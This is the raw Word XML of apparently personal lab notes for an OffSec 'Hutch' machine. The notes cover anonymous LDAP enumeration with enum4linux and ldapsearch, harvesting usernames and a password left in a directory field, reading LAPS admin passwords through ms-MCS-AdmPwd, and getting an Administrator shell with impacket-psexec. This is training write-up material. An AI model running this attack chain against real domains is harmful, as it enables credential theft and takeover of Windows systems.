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8E5786D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3F38A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hutch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574F362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3F38A8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4B12A895" w:rsidR="00843DCE" w:rsidRDefault="00284EF9" w:rsidP="00843DCE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its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with ldap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951FBC5" w14:textId="57E03438" w:rsidR="00284EF9" w:rsidRDefault="00284EF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enum4linux -a t_ip = it shows serever allows with -u’’ and -p ‘’’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3516AC" w14:textId="548333B1" w:rsidR="00284EF9" w:rsidRDefault="00284EF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-v -x -H ldap://t_ip -b “DC=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hutch,DC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=offsec”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2D2CE8B0" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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always search for password = freddy mcsorly has password copy it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE77CC2" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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data of that ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9E9A2" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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grep -I samaaccount name = copy to file and just remain with names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74A671" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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user.txt | cut -d “:” -f 2 &gt; user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="68773762" w:rsidR="00843DCE" w:rsidRDefault="00E2788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user.txt -p paste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30351817" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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for fmcsorly becuas its samaaccount name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9FCFF" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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ldapsearch command AdmPWD command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9BD040" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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with malicious link website we obtain it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A910CC7" w14:textId="77777777" w:rsidR="00E27888" w:rsidRDefault="00E27888" w:rsidP="00E27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-v -x -H ldap://t_ip -b “DC=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hutch,DC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=offsec” -D </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00A7235D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>fmcsorley@hutch.offsec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“(ms-MCS-AdmPwd=*)” ms-MCS-AdmPwd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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2A4EA" w14:textId="77777777" w:rsidR="00644BB9" w:rsidRDefault="00644BB9" w:rsidP="00644BB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-v -x -H ldap://t_ip -b “DC=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hutch,DC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=offsec” -D </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00A7235D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>fmcsorley@hutch.offsec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pate_password “(ms-MCS-AdmPwd=*)” ms-MCS-AdmPwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D6D8A" w14:textId="77777777" w:rsidR="00644BB9" w:rsidRDefault="00644BB9" w:rsidP="00644BB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obtain password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21801A61" w14:textId="77777777" w:rsidR="00644BB9" w:rsidRDefault="00644BB9" w:rsidP="00644BB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impacket-psexec </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hutch.offsec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Administrator:’paste’@t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A80CD82" w14:textId="77777777" w:rsidR="00644BB9" w:rsidRDefault="00644BB9" w:rsidP="00644BB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done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41239E44" w:rsidR="00843DCE" w:rsidRDefault="00644BB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administrator we obtain the proof.txt flag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84EF9"/>
    <w:rsid w:val="003E4BFA"/>
    <w:rsid w:val="003F38A8"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00565FB3"/>
    <w:rsid w:val="005D7DFE"/>
    <w:rsid w:val="00644BB9"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00876C7D"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00E27888"/>
    <w:rsid w:val="00E77F09"/>
    <w:rsid w:val="00EC5B19"/>
    <w:rsid w:val="00ED26F0"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FA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mcsorley@hutch.offsec" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:fmcsorley@hutch.offs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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-11T16:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>